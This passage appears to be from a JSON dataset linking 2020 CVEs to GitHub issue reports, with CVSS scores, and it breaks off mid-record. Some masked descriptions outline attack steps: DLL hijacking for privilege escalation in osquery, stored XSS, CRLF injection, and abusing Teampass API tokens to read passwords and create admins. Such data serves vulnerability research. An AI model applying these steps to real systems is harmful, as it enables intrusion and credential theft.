  46522. "description": "stream out of bounds seek in update_read_synchronize could lead out of bounds read after. vuln code ERRORTAG the code just seek the stream pointer without check stream's length, it could lead APITAG , then the check in other function could failed commit APITAG",
  46523. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L",
  46524. "severity": "LOW",
  46525. "baseScore": 2.2,
  46526. "impactScore": 1.4,
  46527. "exploitabilityScore": 0.7
  46528. },
  46529. {
  46530. "CVE_ID": "CVE-2020-11047",
  46531. "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6009",
  46532. "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6009",
  46533. "Repo_new": "freerdp/freerdp",
  46534. "Issue_Created_At": "2020-03-31T06:00:40Z",
  46535. "description": "memory out of bounds read in APITAG version APITAG vuln code APITAG read NUMBERTAG bytes from stream without check stream's length CODETAG",
  46536. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:H",
  46537. "severity": "MEDIUM",
  46538. "baseScore": 5.9,
  46539. "impactScore": 5.2,
  46540. "exploitabilityScore": 0.7
  46541. },
  46542. {
  46543. "CVE_ID": "CVE-2020-11048",
  46544. "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6007",
  46545. "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6007",
  46546. "Repo_new": "freerdp/freerdp",
  46547. "Issue_Created_At": "2020-03-31T05:40:01Z",
  46548. "description": "memory out of bounds read in rdp_read_flow_control_pdu. version APITAG vuln code APITAG could read NUMBERTAG byte from stream, if APITAG , it could call APITAG . ERRORTAG APITAG just read some byte from stream without check length, it could APITAG , then the check in other function could failed CODETAG",
  46549. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L",
  46550. "severity": "LOW",
  46551. "baseScore": 2.2,
  46552. "impactScore": 1.4,
  46553. "exploitabilityScore": 0.7
  46554. },
  46555. {
  46556. "CVE_ID": "CVE-2020-11049",
  46557. "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6008",
  46558. "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6008",
  46559. "Repo_new": "freerdp/freerdp",
  46560. "Issue_Created_At": "2020-03-31T05:49:34Z",
  46561. "description": "memory out of bounds read in APITAG version APITAG vuln code if APITAG and APITAG , it could one byte overflow read in APITAG CODETAG",
  46562. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L",
  46563. "severity": "LOW",
  46564. "baseScore": 2.2,
  46565. "impactScore": 1.4,
  46566. "exploitabilityScore": 0.7
  46567. },
  46568. {
  46569. "CVE_ID": "CVE-2020-11052",
  46570. "Issue_Url_old": "https://github.com/Sorcery/sorcery/issues/231",
  46571. "Issue_Url_new": "https://github.com/sorcery/sorcery/issues/231",
  46572. "Repo_new": "sorcery/sorcery",
  46573. "Issue_Created_At": "2020-04-30T15:06:10Z",
  46574. "description": "brute force vulnerability. Sorcery NUMBERTAG is vulnerable to brute force attacks even if an login_lock_time_period is configured. If an attacker continues their login attempts after the initial login_lock_time_period has passed, Sorcery no longer rejects those login attempts until eventually the attacker has guessed the right password. This is caused by an early return in PATHTAG which skips the update of the APITAG field. So failed attempts don't update APITAG as long as APITAG contains any date, even if already passed. I'll provide a fix.",
  46575. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  46576. "severity": "CRITICAL",
  46577. "baseScore": 9.8,
  46578. "impactScore": 5.9,
  46579. "exploitabilityScore": 3.9
  46580. },
  46581. {
  46582. "CVE_ID": "CVE-2020-11054",
  46583. "Issue_Url_old": "https://github.com/qutebrowser/qutebrowser/issues/5403",
  46584. "Issue_Url_new": "https://github.com/qutebrowser/qutebrowser/issues/5403",
  46585. "Repo_new": "qutebrowser/qutebrowser",
  46586. "Issue_Created_At": "2020-05-02T14:11:19Z",
  46587. "description": "Security: Reloading page with certificate errors shows a green URL. While working on APITAG I noticed that only the first load of pages with certificate errors gets a correctly colored URL. When loading a page with the default APITAG setting, there's a prompt to confirm the certificate issue: FILETAG When answering that with \"yes\", the URL is then colored yellow ( APITAG ) rather than green ( APITAG ): FILETAG However, when reloading the page (or loading it again in another tab), the URL is green: FILETAG This is because APITAG remembers the answer internally and we don't get a ERRORTAG signal anymore unfortunately there's also no API to check the certificate state of the current page... I'm handling this as a low severity security vulnerability and will request a CVE. There's no way for bad actors to exploit this and the user already did override the certificate error (so should be aware that the connection is not to be trusted), but it still lures users into a false sense of security. A fix, release and security announcement is in progress.",
  46588. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N",
  46589. "severity": "LOW",
  46590. "baseScore": 3.5,
  46591. "impactScore": 1.4,
  46592. "exploitabilityScore": 2.1
  46593. },
  46594. {
  46595. "CVE_ID": "CVE-2020-11058",
  46596. "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6011",
  46597. "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6011",
  46598. "Repo_new": "freerdp/freerdp",
  46599. "Issue_Created_At": "2020-03-31T10:46:15Z",
  46600. "description": "stream out of bounds seek in rdp_read_font_capability_set could lead out of bounds read later. version APITAG vuln code APITAG first read NUMBERTAG byte to length, then check APITAG assume APITAG and APITAG , then the program will pass the check and continue execution ERRORTAG we could control APITAG , then it could enter APITAG APITAG APITAG could call APITAG , because APITAG But currently APITAG CODETAG After APITAG done, it could APITAG Then the check in other functions could fail, and could lead out of bounds read later.",
  46601. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L",
  46602. "severity": "LOW",
  46603. "baseScore": 2.2,
  46604. "impactScore": 1.4,
  46605. "exploitabilityScore": 0.7
  46606. },
  46607. {
  46608. "CVE_ID": "CVE-2020-11073",
  46609. "Issue_Url_old": "https://github.com/MichaelAquilina/zsh-autoswitch-virtualenv/issues/122",
  46610. "Issue_Url_new": "https://github.com/michaelaquilina/zsh-autoswitch-virtualenv/issues/122",
  46611. "Repo_new": "michaelaquilina/zsh-autoswitch-virtualenv",
  46612. "Issue_Created_At": "2020-01-07T11:00:15Z",
  46613. "description": "This is incredibly insecure!. APITAG The script APITAG will be sourced without any user interaction , which will NUMBERTAG Erase the APITAG virtualenv\" message from the terminal (so the user isn't even aware that anything has happened NUMBERTAG Write the output of APITAG to a file called APITAG . Obviously this would be more malicious in practice",
  46614. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  46615. "severity": "HIGH",
  46616. "baseScore": 7.8,
  46617. "impactScore": 5.9,
  46618. "exploitabilityScore": 1.8
  46619. },
  46620. {
  46621. "CVE_ID": "CVE-2020-11075",
  46622. "Issue_Url_old": "https://github.com/anchore/anchore-engine/issues/430",
  46623. "Issue_Url_new": "https://github.com/anchore/anchore-engine/issues/430",
  46624. "Repo_new": "anchore/anchore-engine",
  46625. "Issue_Created_At": "2020-04-22T22:33:27Z",
  46626. "description": "Ensure only supported os overrides are used in skopeo download commands. In the anchore skopeo wrapper, as of NUMBERTAG there is logic that supports multiple attempts to download an image from a registry using a combination of os override and destination type options. The initial implementation in NUMBERTAG attempts to derive an os override option from the image manifest itself, but there are only a couple of overrides that are supported, so it would be better to explicitly enumerate them rather than attempting to use a field from the image manifest. This would have two benefits NUMBERTAG while the input is run through an internal command sanitizer, it may be possible for a string to be crafted to circumvent sanitization and cause incorrect/insecure call out to the skopeo command (e.g. potential for a command injection NUMBERTAG there are only a few known overrides that are supported, so there is no need for this field to be inferred from any input source, which would fail for any override other than the known set that are supported Suggested fix is to alter the code to use an explicit enumeration of the os override options that are supported by anchore/skopeo.",
  46627. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
  46628. "severity": "CRITICAL",
  46629. "baseScore": 9.9,
  46630. "impactScore": 6.0,
  46631. "exploitabilityScore": 3.1
  46632. },
  46633. {
  46634. "CVE_ID": "CVE-2020-11081",
  46635. "Issue_Url_old": "https://github.com/osquery/osquery/issues/6426",
  46636. "Issue_Url_new": "https://github.com/osquery/osquery/issues/6426",
  46637. "Repo_new": "osquery/osquery",
  46638. "Issue_Created_At": "2020-05-01T16:55:20Z",
  46639. "description": "Privilege Escalation Bug in Osquery NUMBERTAG windows) via Dll Search Order Hijacking . Hell osquery team, As per facebook security team, they APITAG recommended to create issue here. Title Privilege Escalation Bug in Osquery NUMBERTAG windows) via Dll Hijacking Vuln Type Code Execution Product Area Open Source (e.g. HHVM) APITAG Complete Details FILETAG NUMBERTAG Create custom payload dll (image: APITAG FILETAG NUMBERTAG Create batch file to execute which include in payload dll (image: APITAG FILETAG NUMBERTAG Then,create or drop payload dll to writable folder C:\\python NUMBERTAG image: APITAG FILETAG NUMBERTAG Check the file that doesn't exist by default (image: APITAG FILETAG NUMBERTAG Then reboot pc ( It's mean user haven't permission to start service. Reboot since osqueryd service is auto). or restart the service (for testing with admin). After reboot or restart the service, Malicious dll APITAG has been loaded and payload will execute. (image: APITAG FILETAG NUMBERTAG payload dll executed as a command FILETAG /c PATHTAG and batch file executed \"whoami\" and print out to FILETAG (image: APITAG ![osquery7]( FILETAG I hope you to understand about my details steps. Thanks. With Best, Sai Wynn Myat.",
  46640. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
  46641. "severity": "HIGH",
  46642. "baseScore": 8.2,
  46643. "impactScore": 6.0,
  46644. "exploitabilityScore": 1.5
  46645. },
  46646. {
  46647. "CVE_ID": "CVE-2020-11104",
  46648. "Issue_Url_old": "https://github.com/USCiLab/cereal/issues/625",
  46649. "Issue_Url_new": "https://github.com/uscilab/cereal/issues/625",
  46650. "Repo_new": "uscilab/cereal",
  46651. "Issue_Created_At": "2020-03-03T02:10:37Z",
  46652. "description": "Serializing long double variables leaks uninitialized memory. Serializing the C/C++ native type long double stores uninitialized data into the serialized form. Compile and run the following program with valgrind to observe this. CODETAG It is apparently an inherent trait of the long double type that even an initialized variable leaves some of its raw storage uninitialized. This gives valgrind errors when compiled with both gcc and clang: ERRORTAG",
  46653. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  46654. "severity": "MEDIUM",
  46655. "baseScore": 5.3,
  46656. "impactScore": 1.4,
  46657. "exploitabilityScore": 3.9
  46658. },
  46659. {
  46660. "CVE_ID": "CVE-2020-11105",
  46661. "Issue_Url_old": "https://github.com/USCiLab/cereal/issues/636",
  46662. "Issue_Url_new": "https://github.com/uscilab/cereal/issues/636",
  46663. "Repo_new": "uscilab/cereal",
  46664. "Issue_Created_At": "2020-03-27T23:28:34Z",
  46665. "description": "std::shared_ptr serialization asymmetry (depends on memory layout). Cereal employs caching of APITAG values, using the raw pointer as a unique identifier. This becomes problematic if an APITAG variable goes out of scope and is freed, and a new APITAG is allocated at the same address. Serialization fidelity thereby becomes dependent upon memory layout. CODETAG Output is: APITAG The input is (true, false) but the output is (true, true).",
  46666. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  46667. "severity": "CRITICAL",
  46668. "baseScore": 9.8,
  46669. "impactScore": 5.9,
  46670. "exploitabilityScore": 3.9
  46671. },
  46672. {
  46673. "CVE_ID": "CVE-2020-11106",
  46674. "Issue_Url_old": "https://github.com/trippo/ResponsiveFilemanager/issues/603",
  46675. "Issue_Url_new": "https://github.com/trippo/responsivefilemanager/issues/603",
  46676. "Repo_new": "trippo/responsivefilemanager",
  46677. "Issue_Created_At": "2020-03-28T11:53:58Z",
  46678. "description": "Stored xss in NUMBERTAG in FILETAG in $_SESSION['RF'][\"view_type\"] because of no validation if FILETAG setted this session.. After taking another look at the APITAG NUMBERTAG i noticed that in the FILETAG file on line NUMBERTAG that if the $_SESSION['RF'][\"view_type\"] is already set that there would not be done any validation or would it take the data from the config. URLTAG This created a problem because in FILETAG in the \"view\" action in the \"type\" parameter it is possible to set that value without any validation. URLTAG This means if you would first request a session by going to the FILETAG , than going to the FILETAG and request the view action and as \"type\" parameter you give a html tag. Than if you done al that go back to the FILETAG page than $_SESSION['RF'][\"view_type\"] would be read and unescaped placed on all places where $view is used what created stored xss until the session isn't valid anymore. A very simple patch would be to add APITAG in the FILETAG on line NUMBERTAG when the $view is set. URLTAG I made a simple html file you can use to validate this vulnerability. It is made for Firefox because it does make use of iframe's and a clickjacking vulnerability but if the session was already set than this would also work in other browsers with a miner change. you would need to change all \" URLTAG \" to your website. When runned it would make NUMBERTAG iframe's. One to request the FILETAG file to get a PHPSESSID and to set $_SESSION['RF'][\"verify\"] as APITAG Second it would open the FILETAG to set the html tag. And tirth it reopens the FILETAG page to trigger the stored xss ERRORTAG A CVE has been requested.",
  46679. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  46680. "severity": "MEDIUM",
  46681. "baseScore": 6.1,
  46682. "impactScore": 2.7,
  46683. "exploitabilityScore": 2.8
  46684. },
  46685. {
  46686. "CVE_ID": "CVE-2020-11111",
  46687. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2664",
  46688. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2664",
  46689. "Repo_new": "fasterxml/jackson-databind",
  46690. "Issue_Created_At": "2020-03-24T17:04:06Z",
  46691. "description": "Block one more gadget type (...). APITAG in Progress) Another gadget type(s) reported regarding a class of [TO BE FILLED]. See URLTAG for description of the general problem. Mitre id: Reporter: Fix will likely be included in NUMBERTAG Does not affect NUMBERTAG and later",
  46692. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  46693. "severity": "HIGH",
  46694. "baseScore": 8.8,
  46695. "impactScore": 5.9,
  46696. "exploitabilityScore": 2.8
  46697. },
  46698. {
  46699. "CVE_ID": "CVE-2020-11112",
  46700. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2666",
  46701. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2666",
  46702. "Repo_new": "fasterxml/jackson-databind",
  46703. "Issue_Created_At": "2020-03-25T17:06:51Z",
  46704. "description": "Block one more gadget type (commons proxy). APITAG in Progress) Another gadget type(s) reported regarding a class of [TO BE FILLED]. See URLTAG for description of the general problem. Mitre id: Reporter: Fix will likely be included in NUMBERTAG Does not affect NUMBERTAG and later",
  46705. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  46706. "severity": "HIGH",
  46707. "baseScore": 8.8,
  46708. "impactScore": 5.9,
  46709. "exploitabilityScore": 2.8
  46710. },
  46711. {
  46712. "CVE_ID": "CVE-2020-11113",
  46713. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2670",
  46714. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2670",
  46715. "Repo_new": "fasterxml/jackson-databind",
  46716. "Issue_Created_At": "2020-03-28T18:08:54Z",
  46717. "description": "Block one more gadget type ( ). APITAG in Progress) Another gadget type(s) reported regarding class(es) of [...] library. See URLTAG for description of the general problem. Mitre id: Reporter: Fix will likely be included in NUMBERTAG Does not affect NUMBERTAG and later",
  46718. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  46719. "severity": "HIGH",
  46720. "baseScore": 8.8,
  46721. "impactScore": 5.9,
  46722. "exploitabilityScore": 2.8
  46723. },
  46724. {
  46725. "CVE_ID": "CVE-2020-11441",
  46726. "Issue_Url_old": "https://github.com/phpmyadmin/phpmyadmin/issues/16056",
  46727. "Issue_Url_new": "https://github.com/phpmyadmin/phpmyadmin/issues/16056",
  46728. "Repo_new": "phpmyadmin/phpmyadmin",
  46729. "Issue_Created_At": "2020-03-30T01:21:02Z",
  46730. "description": "CRLF/HTML entity injection with most recent version of APITAG Describe the bug The login form does not properly escape CRLF sequences, this can lead to HTML entity injection at the very least, or reflected XSS at the very worst. To Reproduce Steps to reproduce the behavior NUMBERTAG Go to APITAG NUMBERTAG Insert into the login fields, username, password, and the hidden field of target, and insert this value into those fields: APITAG and the login error will display the injected CRLF sequences, and injected url encoded entities, such as single or double quotes(double quotes are not as effective as single quotes). Expected behavior I expected the application to drop/filter out the CRLF sequences seeing as an issue similar was detected back in NUMBERTAG Screenshots FILETAG FILETAG Server configuration Operating system: Ubuntu Web server: Apache Database version: APITAG PHP version: most recent. APITAG version: most recent. Client configuration Browser: Firefox Operating system: Windows NUMBERTAG Additional context None.",
  46731. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  46732. "severity": "MEDIUM",
  46733. "baseScore": 6.1,
  46734. "impactScore": 2.7,
  46735. "exploitabilityScore": 2.8
  46736. },
  46737. {
  46738. "CVE_ID": "CVE-2020-11499",
  46739. "Issue_Url_old": "https://github.com/fkie-cad/FACT_core/issues/375",
  46740. "Issue_Url_new": "https://github.com/fkie-cad/fact_core/issues/375",
  46741. "Repo_new": "fkie-cad/fact_core",
  46742. "Issue_Created_At": "2020-03-29T18:07:13Z",
  46743. "description": "Stored XSS when updating analysis details. The application does not sanitize the user input when updating the details of a firmware. When updating the firmware details, the applications posts the data to the \"upload analysis/ FILETAG Adding js to the tags field FILETAG When browsing to the home page it loads the js FILETAG js is executed FILETAG Used the escape function to sanitize the input FILETAG",
  46744. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  46745. "severity": "MEDIUM",
  46746. "baseScore": 6.1,
  46747. "impactScore": 2.7,
  46748. "exploitabilityScore": 2.8
  46749. },
  46750. {
  46751. "CVE_ID": "CVE-2020-11529",
  46752. "Issue_Url_old": "https://github.com/getgrav/grav/issues/3134",
  46753. "Issue_Url_new": "https://github.com/getgrav/grav/issues/3134",
  46754. "Repo_new": "getgrav/grav",
  46755. "Issue_Created_At": "2021-01-06T15:12:06Z",
  46756. "description": "APITAG Open redirect with trailing slash redirect. Environment grav version NUMBERTAG Admin NUMBERTAG php NUMBERTAG and NUMBERTAG tested Problem If grav is on root folder on a domain it seems there is a open redirect. Fist analysis Origin of the problem seems to be the redirect by setting Redirect trailing slash on. Examples Open redirect if on root folder: URLTAG Response header (short NUMBERTAG Found > location | PATHTAG It redirects to: APITAG Less(?) a problem if in subfolder: URLTAG Response header (short NUMBERTAG Found > location PATHTAG Not sure what version is running on your website but it seems not vulnerable: URLTAG",
  46757. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  46758. "severity": "MEDIUM",
  46759. "baseScore": 6.1,
  46760. "impactScore": 2.7,
  46761. "exploitabilityScore": 2.8
  46762. },
  46763. {
  46764. "CVE_ID": "CVE-2020-11558",
  46765. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1440",
  46766. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1440",
  46767. "Repo_new": "gpac/gpac",
  46768. "Issue_Created_At": "2020-03-24T17:16:05Z",
  46769. "description": "3 UAF bugs in box_funcs.c. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! [x] I looked for a similar issue and couldn't find any. [x] I tried with the latest version of GPAC. Installers available at URLTAG [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG Hi GPAC Team, I found NUMBERTAG new UAF bugs on the lastest commit NUMBERTAG eaea8 of GPAC version NUMBERTAG I think it is probably due to an imcomplete fix of the UAF bug URLTAG Actually, these new bugs share the same buggy function which is APITAG in PATHTAG with URLTAG but have different alloc function APITAG in APITAG (instead of APITAG ). Command: APITAG or APITAG NUMBERTAG UAF Bug NUMBERTAG APITAG URLTAG ASAN says: ~~~ APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG dde8 at pc NUMBERTAG c NUMBERTAG e bp NUMBERTAG fff NUMBERTAG c3b NUMBERTAG sp NUMBERTAG fff NUMBERTAG c3b NUMBERTAG READ of size NUMBERTAG at NUMBERTAG dde8 thread T NUMBERTAG c NUMBERTAG d in gf_isom_box_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_array_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_array_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_array_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_array_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_del PATHTAG NUMBERTAG c NUMBERTAG cd in gf_isom_box_array_read_ex PATHTAG NUMBERTAG ae0b0f in APITAG PATHTAG NUMBERTAG c NUMBERTAG in gf_isom_box_read PATHTAG NUMBERTAG c NUMBERTAG in gf_isom_box_parse_ex PATHTAG NUMBERTAG c6e NUMBERTAG in gf_isom_box_array_read_ex PATHTAG NUMBERTAG aeffe8 in APITAG PATHTAG NUMBERTAG c NUMBERTAG in gf_isom_box_read PATHTAG NUMBERTAG c NUMBERTAG in gf_isom_box_parse_ex PATHTAG NUMBERTAG c6e NUMBERTAG in gf_isom_box_array_read_ex PATHTAG NUMBERTAG ae NUMBERTAG in APITAG PATHTAG NUMBERTAG c NUMBERTAG in gf_isom_box_read PATHTAG NUMBERTAG c NUMBERTAG in gf_isom_box_parse_ex PATHTAG NUMBERTAG c7fb4 in gf_isom_parse_root_box PATHTAG NUMBERTAG dd NUMBERTAG in gf_isom_parse_movie_boxes PATHTAG NUMBERTAG e NUMBERTAG d3 in gf_isom_parse_movie_boxes PATHTAG NUMBERTAG e NUMBERTAG d3 in gf_isom_open_file PATHTAG NUMBERTAG d in APITAG PATHTAG NUMBERTAG fca8b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG e4f8 in _start ( PATHTAG NUMBERTAG dde8 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG fca8c NUMBERTAG a in __interceptor_free ( PATHTAG NUMBERTAG c5f9f in gf_isom_box_del PATHTAG previously allocated by thread T0 here NUMBERTAG fca8c NUMBERTAG in malloc ( PATHTAG NUMBERTAG adb NUMBERTAG d in APITAG PATHTAG SUMMARY: APITAG heap use after free PATHTAG gf_isom_box_del ~~~",
  46770. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  46771. "severity": "CRITICAL",
  46772. "baseScore": 9.8,
  46773. "impactScore": 5.9,
  46774. "exploitabilityScore": 3.9
  46775. },
  46776. {
  46777. "CVE_ID": "CVE-2020-11612",
  46778. "Issue_Url_old": "https://github.com/netty/netty/issues/6168",
  46779. "Issue_Url_new": "https://github.com/netty/netty/issues/6168",
  46780. "Repo_new": "netty/netty",
  46781. "Issue_Created_At": "2016-12-30T18:14:58Z",
  46782. "description": "APITAG Codecs should enforce memory allocation size limits. Expected behavior To protect against OOME the compression and decompression codecs should explicitly limit the amount of data they compress and decompress. We may be vulnerable to OOME from large or malicious input. Actual behavior In light of URLTAG most of the compression/decompression codecs don't enforce limits on buffer allocation sizes. Steps to reproduce N/A Minimal yet complete reproducer code (or URL to code) N/A Netty version NUMBERTAG SNAPSHOT JVM version (e.g. APITAG ) N/A OS version (e.g. ERRORTAG ) N/A",
  46783. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  46784. "severity": "HIGH",
  46785. "baseScore": 7.5,
  46786. "impactScore": 3.6,
  46787. "exploitabilityScore": 3.9
  46788. },
  46789. {
  46790. "CVE_ID": "CVE-2020-11619",
  46791. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2680",
  46792. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2680",
  46793. "Repo_new": "fasterxml/jackson-databind",
  46794. "Issue_Created_At": "2020-04-07T01:41:49Z",
  46795. "description": "Block one more gadget type. (note: placeholder until fixed) Another gadget type(s) reported regarding class(es) of [TO BE FILLED]. library. See URLTAG for description of the general problem. Mitre id: Reporter: Fix will be included in NUMBERTAG Does not affect NUMBERTAG and later",
  46796. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  46797. "severity": "HIGH",
  46798. "baseScore": 8.1,
  46799. "impactScore": 5.9,
  46800. "exploitabilityScore": 2.2
  46801. },
  46802. {
  46803. "CVE_ID": "CVE-2020-11620",
  46804. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2682",
  46805. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2682",
  46806. "Repo_new": "fasterxml/jackson-databind",
  46807. "Issue_Created_At": "2020-04-07T15:54:48Z",
  46808. "description": "Block one more gadget type (commons jelly). (note: placeholder until fixed) Another gadget type(s) reported regarding class(es) of APITAG . library. See URLTAG for description of the general problem. Mitre id: Reporter: Fix will be included in NUMBERTAG Does not affect NUMBERTAG and later",
  46809. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  46810. "severity": "HIGH",
  46811. "baseScore": 8.1,
  46812. "impactScore": 5.9,
  46813. "exploitabilityScore": 2.2
  46814. },
  46815. {
  46816. "CVE_ID": "CVE-2020-11671",
  46817. "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2765",
  46818. "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2765",
  46819. "Repo_new": "nilsteampassnet/teampass",
  46820. "Issue_Created_At": "2020-04-02T16:23:40Z",
  46821. "description": "APITAG API has no authorization checks. APITAG provides several APIs that can be used for programmatic access. None of these API functions perform authorization checks which means that any client with a valid API token is effectively an administrator. Any client with a valid API token can: Read all passwords stored by Teampass Create users. This includes non administrative users creating administrative users Update any stored item Update any user Delete any folder or item It\u2019s important to note that API access is disabled by default. Steps to reproduce NUMBERTAG Turn on API access NUMBERTAG As a non admin user, generate an API key NUMBERTAG Send authenticated HTTP requests Retrieve passwords: APITAG Note that the ID for each \u201citem\u201d starts at NUMBERTAG and increments by NUMBERTAG for each new item. This makes it easy to retrieve all items stored by Teampass APITAG Add a new admin user CODETAG Server configuration Teampass version NUMBERTAG",
  46822. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  46823. "severity": "HIGH",
  46824. "baseScore": 8.1,
  46825. "impactScore": 5.2,
  46826. "exploitabilityScore": 2.8
  46827. },
  46828. {
  46829. "CVE_ID": "CVE-2020-11709",
  46830. "Issue_Url_old": "https://github.com/yhirose/cpp-httplib/issues/425",
  46831. "Issue_Url_new": "https://github.com/yhirose/cpp-httplib/issues/425",
  46832. "Repo_new": "yhirose/cpp-httplib",
  46833. "Issue_Created_At": "2020-04-11T03:38:58Z",
  46834. "description": "set_redirect & set_header are susceptible to http response splitting attack. ref: URLTAG Analysis CODETAG APITAG CODETAG Lastly, this library is gorgeous. Thank you!!",
  46835. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  46836. "severity": "HIGH",
  46837. "baseScore": 7.5,
  46838. "impactScore": 3.6,
  46839. "exploitabilityScore": 3.9
  46840. },
  46841. {
  46842. "CVE_ID": "CVE-2020-11721",
  46843. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/134",
  46844. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/134",
  46845. "Repo_new": "saitoha/libsixel",
  46846. "Issue_Created_At": "2020-04-11T06:09:36Z",
  46847. "description": "Invalid free wild pointer lead to DOS in load_png in loader.c. APITAG has a pointer rows , which should be set to NULL, otherwise cleanup code would use(calling free ) it. binary: img2sixel file: loader.c function: load_png poc: FILETAG result: CODETAG",
  46848. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  46849. "severity": "MEDIUM",
  46850. "baseScore": 6.5,
  46851. "impactScore": 3.6,
  46852. "exploitabilityScore": 2.8
  46853. },
  46854. {
  46855. "CVE_ID": "CVE-2020-11767",
  46856. "Issue_Url_old": "https://github.com/istio/istio/issues/9429",
  46857. "Issue_Url_new": "https://github.com/istio/istio/issues/9429",
  46858. "Repo_new": "istio/istio",
  46859. "Issue_Created_At": "2018-10-19T15:08:30Z",
  46860. "description": "ERRORTAG NR when using browser on multiple ingress gateways. Describe the bug When using browsers (tested on multiple browsers, multiple OS, multiple devices and multiple connections), we are having many ERRORTAG NR responses when contacting our services on an additional ingress gateway. The service is loading well every time I'm cleaning the browsers cache and when using command line clients. Routing is done with hostname in separate gateway and virtual services configurations. All services are exposed on port NUMBERTAG using different port names but the same TLS certificate. Ingress log is printing the good hostname but envoy is not finding any routes. Expected behavior We expect to have the requests routed to the service or a way to find if there is something missing in the configuration. Steps to reproduce the bug Install another ingress gateway using helm Deploy NUMBERTAG services and expose it using a gateway with TLS on port NUMBERTAG Use a browser to access the services Version Kubernetes NUMBERTAG on AWS Istio NUMBERTAG Installation Istio installed using helm chart with a first ingress gateway. Second gateway installed using helm in a namespace. Services installed using helm charts. Environment Kubernetes deployed on AWS using Kops with coreos images. Cluster state FILETAG I could not dump pods and deployments due to private information in environment variables",
  46861. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N",
  46862. "severity": "LOW",
  46863. "baseScore": 3.1,
  46864. "impactScore": 1.4,
  46865. "exploitabilityScore": 1.6
  46866. },
  46867. {
  46868. "CVE_ID": "CVE-2020-11767",
